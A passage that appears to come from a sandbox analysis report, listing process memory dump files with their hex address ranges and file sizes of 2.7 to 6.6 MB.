                                                        • memory/3820-600-0x0000000000080000-0x0000000000391000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/3820-597-0x0000000000080000-0x0000000000391000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/3888-731-0x00000000001A0000-0x0000000000832000-memory.dmp

                                                          Filesize

                                                          6.6MB

                                                        • memory/3888-729-0x00000000001A0000-0x0000000000832000-memory.dmp

                                                          Filesize

                                                          6.6MB

                                                        • memory/4980-1175-0x0000000000800000-0x0000000000AAC000-memory.dmp

                                                          Filesize

                                                          2.7MB

                                                        • memory/4980-1178-0x0000000000800000-0x0000000000AAC000-memory.dmp

                                                          Filesize

                                                          2.7MB

                                                        • memory/4980-773-0x0000000000800000-0x0000000000AAC000-memory.dmp

                                                          Filesize

                                                          2.7MB

                                                        • memory/4980-782-0x0000000000800000-0x0000000000AAC000-memory.dmp

                                                          Filesize

                                                          2.7MB

                                                        • memory/4980-783-0x0000000000800000-0x0000000000AAC000-memory.dmp

                                                          Filesize

                                                          2.7MB